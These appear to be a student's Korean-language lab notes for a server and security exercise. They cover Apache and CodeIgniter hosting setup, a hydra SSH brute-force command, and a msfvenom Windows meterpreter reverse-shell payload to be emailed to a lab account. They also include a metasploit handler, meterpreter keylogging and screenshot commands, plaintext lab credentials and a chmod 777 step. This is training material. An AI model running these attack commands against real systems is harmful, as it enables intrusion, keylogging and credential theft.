사전공격하여 ssh 192.168.0.106 메인 서버에 접속
암호는 공유 서버에 저장되어 있음
master 암호와 root 암호는 동일함
hydra -L account.txt -P mainpassword.txt 192.168.0.106 ssh -s 22253
(master/2345)
=> 서버가 다운되어서 그냥 접속하는 것으로 변경
미션1
메인서버에 접속하여 본인의 이니셜 계정 생성후
이니셜.st.kr이 동작하도록 설정할 것
스위치1: 192.168.0.106(변경되었을 수도..)
스위치2: 125.246.95.253
adduser jyb
DocumentRoot /home/jyb/public_html
ServerName jyb.st.kr
ServerAdmin jyb@jyb.st.kr
ErrorLog /home/jyb/public_html/logs/error.log
CustomLog /home/jyb/public_html/logs/access.log combined
st.kr.zone
미션2
ci4를 이용해 서버 점검 페이지를 만들어라!
서버마다 각 계정 부여 후 각자 만들것
일일 점검 내용은 chatgpt를 이용해 스크립트 작성 후 웹화면으로
1. 계정활성화
ci4.st.kr 구축
2. 호스팅 수정
cd /etc/apache2/sites-available/hosting.conf
DocumentRoot /home/ci4/public_html/public
ServerName ci4.st.kr
ServerAdmin ci4@ci4.st.kr
Errorlog /home/ci4/public_html/logs/error.log
CustomLog /home/ci4/public_html/logs/access.log combined
AllowOverride All
Require all granted
Options None
3. writable 권한 바꾸기
chmod -R 777 writable (권한변경)
4. a2enmod rewrite
5. cd /home/ci4/public_html
cp env .env
nano .env
CI_ENVIRONMENT = development (개발자모드 변경) <->production (?)
에러 뜨면 이유를 알려줌
미션3
칼리 악성코드 작성 후 master@st.kr로 메일 보내기
본인의 ip로 만들어주 보내기
메일
dhcp
nat x
어댑터에 브릿지 > 고정아이피 주기
gns x
dns 125.246.95.253
nslookup st.kr
xshell
systemctl start ssh
msfvenom --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.0.216 LPORT=4444 -b "\x00" -f exe -o /home/kali/ip216.exe (악성코드 생성)
nano malware.rc
use exploit/multi/handler
user payload windows/meterpreter/reverse_tcp
set lhost 192.168.0.214
set lport 4444
exploit
netstat -ant | grep 4444
nc -l -p 4444
msfconsole -r /home/kali/malware.rc
keyscan_start
keyscan_dump
screenshot
순수 로그만 보고 침투 흔적 찾기
ssh://125.246.95.253
(master/2345)
(master/8888) root:7777
(master/2222) root:1111
내일!!
미션4
미션1,2,3완료 후 키 인증 방식으로 변경